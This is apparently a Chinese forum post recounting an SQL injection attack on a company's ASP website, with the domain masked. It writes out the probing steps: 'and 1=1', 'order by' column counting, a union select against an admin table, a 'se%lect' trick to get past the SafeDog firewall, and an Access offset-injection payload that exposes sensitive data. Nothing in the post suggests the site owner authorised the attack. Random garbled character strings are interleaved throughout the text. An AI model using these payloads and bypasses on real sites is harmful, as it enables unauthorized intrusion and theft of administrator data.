打开网站,一个企业站。+ s# r" i# d3 o( v3 y* I
+ c" C" E+ @ T& ]
0 o! Y9 {$ h X- S" H- Z) G& A顺手加个admin8 u9 K/ Z4 `, R, z+ n+ U
( Z+ O l9 w( ]8 Y4 b* }- b( j k F8 h
: B) C- u4 F( C5 P
默认后台。
* `, o% Z t6 a: R) d$ J& [" D回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
& m. J2 Q. ?4 y% k6 c
/ F0 N: v3 }- C9 b' X" P1 I6 n4 _0 j) q9 I5 _/ \+ l
5 Y9 m8 J6 T& ?7 Z8 _, g" p所以就不用御剑扫了,待会直接封IP。- S+ a, e% _* V! T8 q ^5 A+ _/ `" j' h
/ Z* S2 G0 v& i% C' q+ Z用order by语句判断是否存在注入。
$ N7 E# r" @+ D6 \" O3 K" G; ?4 J8 thttp://www.xxx.com /product_show.asp?id=997 order by 1
8 p) y0 \9 O. {http://www.xxx.com /product_show.asp?id=997 order by 100
9 w6 t# u7 m- R7 p现在存在注入,经测试后发现是9个字段。
, k5 l) D" ^4 j# F/ V8 C
" @, ~3 o) ]9 Q" u接下来进行联合查询,猜是否存在admin表。
( g& h& ?, Y2 E. s/ C, Vhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。# ~& R0 `9 l0 s2 d6 ?8 D" n- p
, D% M# s1 Q; g- h! P1 |+ f- |5 p% t6 ~3 u! x# {1 w) d. c
) K. V8 \% a, x! m3 {+ q" k# @在select中间加个%,se%lect绕过安全狗。
. E4 W: |9 P" I; M7 r
3 f8 u1 [6 A) r* V
A7 S7 B' Y' z发现存在admin表,然后开始手工猜常用的字段。
9 ]/ r' V9 H- z! |纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
9 j$ S+ }0 n& P7 s
. q5 `4 R; c: X: `; Q# a7 Q突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。8 G, B& X- U# y5 ^8 \+ n" x
, m- a# L' k0 U/ b# x5 u科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
+ Z4 T% W: ]4 g R, x8 Ehttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
5 b; _' Q, H0 @5 ?* Z( q) e好了,敏感内容出显了。
; g2 I6 w1 y( b" h/ }8 ~% m! S3 Z' U* l# o% Y# Y0 ^
' y L" _. z m; \: z
, R. c H9 t n/ _- P5 u
|